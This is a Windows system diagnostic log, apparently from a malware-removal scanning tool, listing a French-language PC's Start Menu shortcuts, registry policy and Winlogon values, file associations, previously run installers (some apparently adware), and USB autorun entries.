C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\A propos de Java.lnk        (-tab about) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Rechercher les mises à jour.lnk        (-tab update) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Backup and Restore Center.lnk        (/name Microsoft.BackupAndRestore) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus\Désinstaller.lnk        (C:\Program Files\McAfee Security Scan\3.11.334\McAfee.ico) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus\McAfee Security Scan Plus.lnk        (SecurityScanner.dll) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Starter (Français)\Microsoft Excel Starter 2010.lnk        ("Microsoft Excel Starter 2010 90140066040C0000") 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Starter (Français)\Microsoft Word Starter 2010.lnk        ("Microsoft Word Starter 2010 90140066040C0000") 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Starter (Français)\Outils Microsoft Office 2010\Bibliothèque multimédia Microsoft.lnk        ("Bibliothèque multimédia Microsoft 90140066040C0000") 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Starter (Français)\Outils Microsoft Office 2010\Microsoft Office 2010 Centre de téléchargement.lnk        ("Microsoft Office 2010 Centre de téléchargement 90140066040C0000") 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Starter (Français)\Outils Microsoft Office 2010\Microsoft Office Picture Manager.lnk        ("Microsoft Office Picture Manager 90140066040C0000") 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Starter (Français)\Outils Microsoft Office 2010\Microsoft Office Starter To-Go Device Manager 2010.lnk        ("Microsoft Office Starter To-Go Device Manager 2010 90140066040C0000") 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Picasa 3\Configurer la Visionneuse de photos Picasa.lnk        (/reconfig) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk        () 3.11.334h2�H�e  SSSCHE~1.EXEL﾿H�e�H�*��CSSScheduler.exe
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\Reset VLC media player preferences and cache files.lnk        (--reset-config --reset-plugins-cache vlc://quit) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\VLC media player - reset preferences and cache files.lnk        (--reset-config --reset-plugins-cache vlc://quit) 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN\VLC media player skinned.lnk        (-Iskins) 

---------- | AppCertDlls | AppInit_DLLs


---------- | Dnsapi.dll

C:\Windows\System32\dnsapi.dll -> OK : \drivers\etc\hosts
C:\Windows\SysWOW64\dnsapi.dll -> OK : \drivers\etc\hosts

---------- | Policies | Registry

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Control Panel\Desktop]
"ScreenSaveActive"=1   
"ActiveWndTrackTimeout"=0   
"BlockSendInputResets"=0   
"CaretWidth"=1   
"ClickLockTime"=1200   
"CoolSwitchColumns"=7   
"CoolSwitchRows"=3   
"CursorBlinkRate"=530   
"DockMoving"=1   
"DragFromMaximize"=1   
"DragFullWindows"=1   
"DragHeight"=4   
"DragWidth"=4   
"FocusBorderHeight"=1   
"FocusBorderWidth"=1   
"FontSmoothing"=2   
"FontSmoothingGamma"=0   
"FontSmoothingOrientation"=1   
"FontSmoothingType"=2   
"ForegroundFlashCount"=7   
"ForegroundLockTimeout"=200000   
"LeftOverlapChars"=3   
"MenuShowDelay"=400   
"PaintDesktopVersion"=0   
"RightOverlapChars"=3   
"SnapSizing"=1   
"TileWallpaper"=0   
"WallpaperOriginX"=0   
"WallpaperOriginY"=0   
"WallpaperStyle"=10   
"WheelScrollChars"=3   
"WheelScrollLines"=3   
"WindowArrangementActive"=1   
"UserPreferencesMask"=0x9E3E078012000000   
"Wallpaper"=C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg   [17/08/2012 09:53:44]
"Pattern Upgrade"=TRUE   
"ScreenSaveTimeOut"=3600   
"ScreenSaverIsSecure"=0   
"SCRNSAVE.EXE"=C:\Windows\system32\PhotoScreensaver.scr   [21/11/2010 05:25:05]
"WaitToKillAppTimeout"=200   

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=145   

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]
"{59031a47-3f72-44a7-89c5-5595fe6b30ee}"=0   
"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"=0   

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\CurrentVersion\Explorer]
"ExplorerStartupTraceRecorded"=1   
"ShellState"=0x240000003028000000000000000000000000000001000000120000000000000022000000   
"CleanShutdown"=0   
"EnableAutoTray"=0   
"Browse For Folder Width"=555   
"Browse For Folder Height"=464   
"link"=0x1E000000   
"Reason Setting"=255   

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Start_SearchFiles"=2   
"ServerAdminUI"=0   
"Hidden"=2   
"ShowCompColor"=1   
"HideFileExt"=1   
"DontPrettyPath"=0   
"ShowInfoTip"=1   
"MapNetDrvBtn"=0   
"WebView"=1   
"Filter"=0   
"SuperHidden"=0   
"SeparateProcess"=0   
"AutoCheckSelect"=1   
"IconsOnly"=0   
"ShowTypeOverlay"=1   
"ListviewAlphaSelect"=1   
"ListviewShadow"=1   
"TaskbarAnimations"=1   
"StartMenuInit"=4   
"Start_ShowHelp"=0   
"Start_ShowMyDocs"=1   
"Start_ShowMyPics"=0   
"Start_ShowMyMusic"=0   
"Start_AdminToolsRoot"=0   
"StartMenuAdminTools"=0   
"Start_TrackDocs"=0   
"Start_TrackProgs"=0   
"Start_PowerButtonAction"=2   
"Start_ShowPrinters"=0   
"Start_ShowSetProgramAccessAndDefaults"=0   
"TaskbarSizeMove"=0   
""=0   
"Start_ShowControlPanel"=1   
"Start_ShowMyComputer"=1   
"Start_ShowRun"=1   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=5   
"ConsentPromptBehaviorUser"=3   
"EnableInstallerDetection"=1   
"EnableLUA"=1   
"EnableSecureUIAPaths"=1   
"EnableUIADesktopToggle"=0   
"EnableVirtualization"=1   
"PromptOnSecureDesktop"=0   
"ValidateAdminCodeSignatures"=0   
"dontdisplaylastusername"=0   
"legalnoticecaption"=   
"legalnoticetext"=   
"scforceoption"=0   
"shutdownwithoutlogon"=1   
"undockwithoutlogon"=1   
"FilterAdministratorToken"=0   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoActiveDesktop"=1   
"NoActiveDesktopChanges"=1   
"ForceActiveDesktopOn"=0   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]
"NoAddingComponents"=1   
"NoComponents"=1   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]
"{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}"=1   
"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"=1   
"{208D2C60-3AEA-1069-A2D7-08002B30309D}"=1   
"{871C5380-42A0-1069-A2EA-08002B30309D}"=1   
"{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}"=1   
"{59031a47-3f72-44a7-89c5-5595fe6b30ee}"=1   
"{031E4825-7B94-4dc3-B131-E946B44C8DD5}"=1   
"{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}"=1   
"{9343812e-1c37-4a49-a12e-4b2d810d956b}"=1   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu]
"{871C5380-42A0-1069-A2EA-08002B30309D}.default"=0   
"{9343812e-1c37-4a49-a12e-4b2d810d956b}"=1   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"=Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced   
"Text"=@shell32.dll,-30500   
"Type"=radio   
"CheckedValue"=1   
"ValueName"=Hidden   
"DefaultValue"=2   
"HKeyRoot"=2147483649   
"HelpID"=shell.hlp#51105   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer]
"ListViewPopupControl"={8be9f5ea-e746-4e47-ad57-3fb191ca1eed}   
"BrowserCFCreator"={57f8510b-a5e2-41da-a8f0-8a5ae85dfffd}   
"GlobalFolderSettings"={EF8AD2D1-AE36-11D1-B2D2-006097DF8C11}   
"LVPopupSearchControl"={fccf70c8-f4d7-4d8b-8c17-cd6715e37fff}   
"FileOpenDialog"={DC1C5A9C-E88A-4dde-A5A1-60F82A20AEF7}   
"IconUnderline"=2   
"GlobalAssocChangedCounter"=449   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"TaskbarSizeMove"=0   
"Start_ShowControlPanel"=1   
"Start_ShowMyComputer"=1   
"Start_ShowMyDocs"=1   
"Start_ShowRun"=1   

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"Application"=http://go.microsoft.com/fwlink/?LinkId=57426&Ext=%s   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=5   
"ConsentPromptBehaviorUser"=3   
"EnableInstallerDetection"=1   
"EnableLUA"=1   
"EnableSecureUIAPaths"=1   
"EnableUIADesktopToggle"=0   
"EnableVirtualization"=1   
"PromptOnSecureDesktop"=0   
"ValidateAdminCodeSignatures"=0   
"dontdisplaylastusername"=0   
"legalnoticecaption"=   
"legalnoticetext"=   
"scforceoption"=0   
"shutdownwithoutlogon"=1   
"undockwithoutlogon"=1   
"FilterAdministratorToken"=0   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoActiveDesktop"=1   
"NoActiveDesktopChanges"=1   
"ForceActiveDesktopOn"=0   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]
"NoAddingComponents"=1   
"NoComponents"=1   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]
"{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}"=1   
"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"=1   
"{208D2C60-3AEA-1069-A2D7-08002B30309D}"=1   
"{871C5380-42A0-1069-A2EA-08002B30309D}"=1   
"{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}"=1   
"{59031a47-3f72-44a7-89c5-5595fe6b30ee}"=1   
"{031E4825-7B94-4dc3-B131-E946B44C8DD5}"=1   
"{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}"=1   
"{9343812e-1c37-4a49-a12e-4b2d810d956b}"=1   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu]
"{871C5380-42A0-1069-A2EA-08002B30309D}.default"=0   
"{9343812e-1c37-4a49-a12e-4b2d810d956b}"=1   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"=Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced   
"Text"=@shell32.dll,-30500   
"Type"=radio   
"CheckedValue"=1   
"ValueName"=Hidden   
"DefaultValue"=2   
"HKeyRoot"=2147483649   
"HelpID"=shell.hlp#51105   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer]
"ListViewPopupControl"={8be9f5ea-e746-4e47-ad57-3fb191ca1eed}   
"BrowserCFCreator"={57f8510b-a5e2-41da-a8f0-8a5ae85dfffd}   
"GlobalFolderSettings"={EF8AD2D1-AE36-11D1-B2D2-006097DF8C11}   
"LVPopupSearchControl"={fccf70c8-f4d7-4d8b-8c17-cd6715e37fff}   
"FileOpenDialog"={DC1C5A9C-E88A-4dde-A5A1-60F82A20AEF7}   
"IconUnderline"=2   
"GlobalAssocChangedCounter"=552   
"MaxCachedTiles1"=CFZCROKITKCA41142   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"TaskbarSizeMove"=0   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"Application"=http://go.microsoft.com/fwlink/?LinkId=57426&Ext=%s   


---------- | Winlogon 

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ExcludeProfileDirs"=AppData\Local;AppData\LocalLow;$Recycle.Bin   
"BuildNumber"=7601   
"FirstLogon"=0   
"ParseAutoexec"=1   

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ReportBootOk"=1   
"Shell"=explorer.exe   
"PreCreateKnownFolders"={A520A1A4-1780-4FF6-BD18-167343C5AF16}   
"Userinit"=C:\Windows\system32\userinit.exe,   
"VMApplet"=SystemPropertiesPerformance.exe /pagefile   
"AutoRestartShell"=1   
"Background"=0 0 0   
"CachedLogonsCount"=10   
"DebugServerCommand"=no   
"ForceUnlockLogon"=0   
"LegalNoticeCaption"=   
"LegalNoticeText"=   
"PasswordExpiryWarning"=5   
"PowerdownAfterShutdown"=0   
"ShutdownWithoutLogon"=0   
"WinStationsDisabled"=0   
"DisableCAD"=1   
"scremoveoption"=0   
"ShutdownFlags"=43   
"allocatecdroms"=0   

[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ReportBootOk"=1   
"Shell"=explorer.exe   
"PreCreateKnownFolders"={A520A1A4-1780-4FF6-BD18-167343C5AF16}   
"DefaultDomainName"=   
"DefaultUserName"=   
"Userinit"=userinit.exe,   
"VMApplet"=SystemPropertiesPerformance.exe /pagefile   


---------- | Associations

[HKLM\Software\Classes\.exe]
""=exefile   
"Content Type"=application/x-msdownload   

[HKLM\Software\Classes\exefile\Shell\Open\Command]
""="%1" %*   
"IsolatedCommand"="%1" %*   

[HKLM\Software\Classes\.com]
""=comfile   

[HKLM\Software\Classes\comfile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\Classes\.reg]
""=regfile   

[HKLM\Software\Classes\regfile\Shell\Open\Command]
""=regedit.exe "%1"   

[HKLM\Software\Classes\.scr]
""=scrfile   

[HKLM\Software\Classes\scrfile\Shell\Open\Command]
""="%1" /S   

[HKLM\Software\Classes\.bat]
""=batfile   

[HKLM\Software\Classes\batfile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\Classes\.cmd]
""=cmdfile   

[HKLM\Software\Classes\cmdfile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\Classes\.pif]
""=piffile   

[HKLM\Software\Classes\piffile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\Classes\.inf]
""=inffile   

[HKLM\Software\Classes\inffile\Shell\Open\Command]
""=%SystemRoot%\system32\NOTEPAD.EXE %1   

[HKLM\Software\Classes\.url]
""=InternetShortcut   

[HKLM\Software\Classes\.lnk]
""=lnkfile   

[HKLM\Software\Classes\InternetShortcut]
"NeverShowExt"=   
"InfoTip"=prop:System.Link.TargetUrl;System.Rating;System.Link.Description;System.Link.Comment   
"EditFlags"=2   
"FullDetails"=prop:System.Link.TargetUrl;System.Rating;System.Link.Description;System.Link.Comment   
"IsShortcut"=   
"FriendlyTypeName"=@C:\Windows\System32\ieframe.dll,-10046   
"PreviewDetails"=prop:System.Link.TargetUrl;System.Rating;System.History.VisitCount;System.History.DateChanged;System.Link.DateVisited;System.Link.Description;System.Link.Comment   

[HKLM\Software\Classes\Application.Manifest]
""=Application Manifest   
"EditFlags"=65536   
"BrowserFlags"=4096   
"FriendlyTypeName"=@dfshim.dll,-200   

[HKLM\Software\Classes\Application.Reference]
"NeverShowExt"=   
""=Application Reference   
"IsShortcut"=   
"EditFlags"=131072   
"FriendlyTypeName"=@dfshim.dll,-201   

[HKLM\Software\Classes\Folder]
"ContentViewModeLayoutPatternForBrowse"=delta   
"ContentViewModeForBrowse"=prop:~System.ItemNameDisplay;~System.LayoutPattern.PlaceHolder;~System.LayoutPattern.PlaceHolder;~System.LayoutPattern.PlaceHolder;System.DateModified   
"ContentViewModeLayoutPatternForSearch"=alpha   
"ContentViewModeForSearch"=prop:~System.ItemNameDisplay;System.DateModified;~System.ItemFolderPathDisplay   
""=Folder   
"EditFlags"=0xD2030000   
"FullDetails"=prop:System.PropGroup.Description;System.ItemNameDisplay;System.ItemTypeText;System.Size   
"NoRecentDocs"=   
"ThumbnailCutoff"=0   
"TileInfo"=prop:System.Title;System.ItemTypeText   

[HKLM\Software\WOW6432Node\Classes\.exe]
""=exefile   
"Content Type"=application/x-msdownload   

[HKLM\Software\WOW6432Node\Classes\exefile\Shell\Open\Command]
""="%1" %*   
"IsolatedCommand"="%1" %*   

[HKLM\Software\WOW6432Node\Classes\.com]
""=comfile   

[HKLM\Software\WOW6432Node\Classes\comfile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\WOW6432Node\Classes\.reg]
""=regfile   

[HKLM\Software\WOW6432Node\Classes\regfile\Shell\Open\Command]
""=regedit.exe "%1"   

[HKLM\Software\WOW6432Node\Classes\.scr]
""=scrfile   

[HKLM\Software\WOW6432Node\Classes\scrfile\Shell\Open\Command]
""="%1" /S   

[HKLM\Software\WOW6432Node\Classes\.bat]
""=batfile   

[HKLM\Software\WOW6432Node\Classes\batfile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\WOW6432Node\Classes\.cmd]
""=cmdfile   

[HKLM\Software\WOW6432Node\Classes\cmdfile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\WOW6432Node\Classes\.pif]
""=piffile   

[HKLM\Software\WOW6432Node\Classes\piffile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\WOW6432Node\Classes\.inf]
""=inffile   

[HKLM\Software\WOW6432Node\Classes\inffile\Shell\Open\Command]
""=%SystemRoot%\system32\NOTEPAD.EXE %1   

[HKLM\Software\WOW6432Node\Classes\.url]
""=InternetShortcut   

[HKLM\Software\WOW6432Node\Classes\.lnk]
""=lnkfile   

[HKLM\Software\WOW6432Node\Classes\InternetShortcut]
"NeverShowExt"=   
"InfoTip"=prop:System.Link.TargetUrl;System.Rating;System.Link.Description;System.Link.Comment   
"EditFlags"=2   
"FullDetails"=prop:System.Link.TargetUrl;System.Rating;System.Link.Description;System.Link.Comment   
"IsShortcut"=   
"FriendlyTypeName"=@C:\Windows\System32\ieframe.dll,-10046   
"PreviewDetails"=prop:System.Link.TargetUrl;System.Rating;System.History.VisitCount;System.History.DateChanged;System.Link.DateVisited;System.Link.Description;System.Link.Comment   

[HKLM\Software\WOW6432Node\Classes\Application.Manifest]
""=Application Manifest   
"EditFlags"=65536   
"BrowserFlags"=4096   
"FriendlyTypeName"=@dfshim.dll,-200   

[HKLM\Software\WOW6432Node\Classes\Application.Reference]
"NeverShowExt"=   
""=Application Reference   
"IsShortcut"=   
"EditFlags"=131072   
"FriendlyTypeName"=@dfshim.dll,-201   

[HKLM\Software\WOW6432Node\Classes\Folder]
"ContentViewModeLayoutPatternForBrowse"=delta   
"ContentViewModeForBrowse"=prop:~System.ItemNameDisplay;~System.LayoutPattern.PlaceHolder;~System.LayoutPattern.PlaceHolder;~System.LayoutPattern.PlaceHolder;System.DateModified   
"ContentViewModeLayoutPatternForSearch"=alpha   
"ContentViewModeForSearch"=prop:~System.ItemNameDisplay;System.DateModified;~System.ItemFolderPathDisplay   
""=Folder   
"EditFlags"=0xD2030000   
"FullDetails"=prop:System.PropGroup.Description;System.ItemNameDisplay;System.ItemTypeText;System.Size   
"NoRecentDocs"=   
"ThumbnailCutoff"=0   
"TileInfo"=prop:System.Title;System.ItemTypeText   

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Clients\StartMenuInternet\FIREFOX.EXE\Shell\open\Command]
""=   
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Clients\StartMenuInternet\FIREFOX.EXE\InstallInfo]
"ReinstallCommand"=

[HKLM\Software\Clients\StartMenuInternet\FIREFOX.EXE\Shell\open\Command]
""="C:\Program Files (x86)\mozilla firefox\firefox.exe"   
[HKLM\Software\Clients\StartMenuInternet\FIREFOX.EXE\InstallInfo]
"ReinstallCommand"="C:\Program Files (x86)\mozilla firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal

[HKLM\Software\Clients\StartMenuInternet\Google Chrome\Shell\open\Command]
""="C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"   
[HKLM\Software\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"ReinstallCommand"="C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --make-default-browser

[HKLM\Software\Clients\StartMenuInternet\IEXPLORE.EXE\Shell\open\Command]
""="C:\Program Files (x86)\Internet Explorer\iexplore.exe"   
[HKLM\Software\Clients\StartMenuInternet\IEXPLORE.EXE\InstallInfo]
"ReinstallCommand"="C:\Windows\System32\ie4uinit.exe" -reinstall

[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\FIREFOX.EXE\Shell\open\Command]
""="C:\Program Files (x86)\mozilla firefox\firefox.exe"   
[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\FIREFOX.EXE\InstallInfo]
"ReinstallCommand"="C:\Program Files (x86)\mozilla firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal

[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\Google Chrome\Shell\open\Command]
""="C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"   
[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"ReinstallCommand"="C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --make-default-browser

[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\IEXPLORE.EXE\Shell\open\Command]
""="C:\Program Files (x86)\Internet Explorer\iexplore.exe"   
[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\IEXPLORE.EXE\InstallInfo]
"ReinstallCommand"="C:\Windows\System32\ie4uinit.exe" -reinstall


---------- | AppcompatFlags

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted]
"C:\Users\Utilisateur\Desktop\Izarc 4.1.7.exe"=1
"C:\Users\Utilisateur\Desktop\Picasa 3.9.exe"=1
"C:\Users\Utilisateur\Desktop\MALWAREBYTES.exe"=1
"C:\Users\Utilisateur\Desktop\Adobe Reader 10.1.3.exe"=1
"C:\Users\Utilisateur\Desktop\CD Burner 64 bits 4.4.1.exe"=1
"C:\Users\Utilisateur\Desktop\Windows Live INSTALL 7.exe"=1
"C:\Users\Utilisateur\Desktop\VLC 2.0.3.exe"=1
"C:\Users\Utilisateur\Downloads\install_flashplayer11x32ax_gtbd_chrd_dn_aih.exe"=1
"C:\Users\Utilisateur\Desktop\Defrag 3.5.exe"=1
"\\serveur\SSI\4 - Logiciels\XBMC 11.exe"=1
"\\serveur\SSI\4 - Logiciels\Google Chrome 21.exe"=1
"\\serveur\SSI\4 - Logiciels\Java - 7.9 - 32 bits.exe"=1
"C:\Users\Utilisateur\Desktop\Adobe Reader - 11 - 32 bits.exe"=1
"\\serveur\SSI\4 - Logiciels\CD Burner - 4.4.2.3442 - 64 bits.exe"=1
"\\serveur\SSI\4 - Logiciels\Picasa - 3.9.exe"=1
"\\serveur\SSI\4 - Logiciels\Malwarebytes - 1.65.exe"=1
"C:\Users\Utilisateur\Desktop\MaConfig.exe"=1
"C:\Users\Utilisateur\Desktop\VLC - 2.0.4.exe"=1
"C:\Users\Utilisateur\Downloads\burnaware_free.exe"=1
"C:\Users\Utilisateur\Downloads\CPM_SETUP_1.3.2.30_xp_vista_server2003_win7.exe"=1
"C:\Users\Utilisateur\Desktop\LaunchManager_Dritek_4.0.12_W7x86W7x64_A\Launch Manager_Dritek_4.0.12_Win7x86x64\Setup.exe"=1
"C:\Users\Utilisateur\Desktop\Broadcom_BCM43xx_5.100.249.2\Setup.exe"=1
"C:\Users\Utilisateur\Desktop\INF_allOS_9.3.0.1026_PV\INF_allOS_9.3.0.1026_PV\Setup.exe"=1
"C:\Users\Utilisateur\Desktop\13-1_mobility_vista_win7_win8_64_dd_ccc_whql.exe"=1
"C:\Users\Utilisateur\Desktop\iata_cd.exe"=1
"C:\Users\Utilisateur\Desktop\MEI_ALLOS_6.1.0.1042_PV.exe"=1
"C:\Users\Utilisateur\Desktop\Audio - REALTEK HD\Setup.exe"=1
"C:\Users\Utilisateur\Downloads\SkypeSetup.exe"=1
"C:\Users\Utilisateur\Downloads\Firefox Setup 18.0.2.exe"=1
"C:\Users\Utilisateur\Downloads\winamp563_full_emusic-7plus_fr-fr.exe"=1
"C:\Users\Utilisateur\Desktop\inst_chronotron.exe"=1
"C:\Users\Utilisateur\Downloads\Chronotron_v31.exe"=1
"C:\Users\Utilisateur\Downloads\pacemaker.exe"=1
"C:\Users\Utilisateur\Downloads\camfrog-video-chat-windows-malavida.exe"=1
"C:\Users\Utilisateur\Desktop\camfrog.exe"=1
"C:\Users\UTILIS~1\AppData\Local\Temp\ibtmpc810551\component_610.decrpt"=1
"C:\Users\Utilisateur\Downloads\VideoPerformerSetup.exe"=1
"C:\Users\UTILIS~1\AppData\Local\Temp\4B8E9AC0-BAB0-7891-A432-E31ADF2E1956\Setup.exe"=1
"C:\Users\UTILIS~1\AppData\Local\Temp\__TEMPWEBPLAYER__\DeltaTB.exe"=1
"C:\Users\UTILIS~1\AppData\Local\Temp\3A6A377B-BAB0-7891-A998-0EE94B834EFD\Setup.exe"=1
"C:\Users\UTILIS~1\AppData\Local\Temp\__TEMPWEBGAMEPLAY__\DeltaTB.exe"=1
"C:\Users\Utilisateur\Downloads\Setup_WebGame.exe"=1
"C:\Program Files (x86)\SweetIM\Installers\uninstff2.exe"=1
"C:\Users\Utilisateur\Downloads\VLCMediaPlayerSetup-5B2wqsv.exe"=1
"C:\Users\Utilisateur\Downloads\iLividSetup.exe"=1
"C:\Users\Utilisateur\Downloads\WoT_internet_install_eu(2).exe"=1
"C:\Users\UTILIS~1\AppData\Local\Temp\nsv4CC3.tmp\DeltaTB.exe"=1
"C:\Users\Utilisateur\Downloads\Firefox Setup 24.0.exe"=1
"C:\Users\Utilisateur\Downloads\FacebookVideoCallSetup_v1.2.205.0 (1).exe"=1
"C:\Users\Utilisateur\Downloads\wt_launcher_1.0.1.278.exe"=1
"C:\Program Files (x86)\WinRAR\uninstall.exe"=1
"E:\AutoRun.exe"=1
"C:\Users\Utilisateur\Documents\installer_powerpoint_2013_preview_15_0_4128_Spanish.exe"=1
"C:\Users\Utilisateur\Documents\Download.exe"=1
"C:\Users\Utilisateur\Documents\Vlc_2.1.0.exe"=1
"C:\Program Files (x86)\Google\Picasa3\PicasaPhotoViewer.exe"=1
"C:\Users\Utilisateur\Documents\portal_prelude_jeu_complet_v1.1.5_multi-langues_263038.exe"=1
"C:\Program Files (x86)\portal prelude\Uninstall Portal Prelude.exe"=1
"C:\Users\Utilisateur\Documents\installer_portal_2_1_0_French.exe"=1
"C:\Users\Utilisateur\Desktop\DungeonsDragonsOnlineEberronUnlimitedEN\dndsetup.exe"=1
"C:\Users\Utilisateur\Documents\PRLPC.www.compucalitv.com\PRLPC.www.compucalitv.com\Portal.exe"=1
"SIGN.MEDIA=B23D51 AutoRun.exe"=1
"C:\Program Files\Portal Latinloaders.Tk\Portal\Portal.exe"=1
"C:\Users\Utilisateur\Documents\ManyCamSetup.exe"=1
"C:\Users\Utilisateur\Downloads\Firefox Setup 27.0.1.exe"=1
"C:\Users\Utilisateur\Downloads\Firefox Setup 27.0.1 (1).exe"=1
"C:\Users\Utilisateur\AppData\Roaming\~rjnnnyb.exe"=1
"C:\Users\Utilisateur\Downloads\mozilla-firefox_33-0-2_fr_11003.exe"=1
"C:\Users\Utilisateur\Documents\wlsetup-web.exe"=1
"C:\Users\Utilisateur\Downloads\Youwave_Android-2-3-4.exe"=1
"C:\Users\Utilisateur\Downloads\vlc-2.2.1-win32.exe"=1
"C:\Users\Utilisateur\Downloads\readerdc_fr_ha_install.exe"=1
"C:\Users\Utilisateur\Downloads\ChromeSetup.exe"=1
"C:\Users\Utilisateur\Downloads\mbam-setup-2.2.1.1043.exe"=1
"C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe"=1
"C:\Users\Public\Desktop\avast_free_antivirus_setup_online.exe"=1
"C:\Users\UTILIS~1\AppData\Local\Temp\AIR6E6B.tmp\Adobe AIR Installer.exe"=1


---------- | IFEO


---------- | Mountpoints2

[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\E] : E:\AutoRun.exe     (AutoRun)
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\F] : F:\AutoRun.exe     (AutoRun)
[HKU\S-1-5-21-3594765525-3045979897-1626392610-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\{15107b1e-3785-11e5-9176-1c7508dfa56f}] : E:\iLinker.exe     (AutoRun)
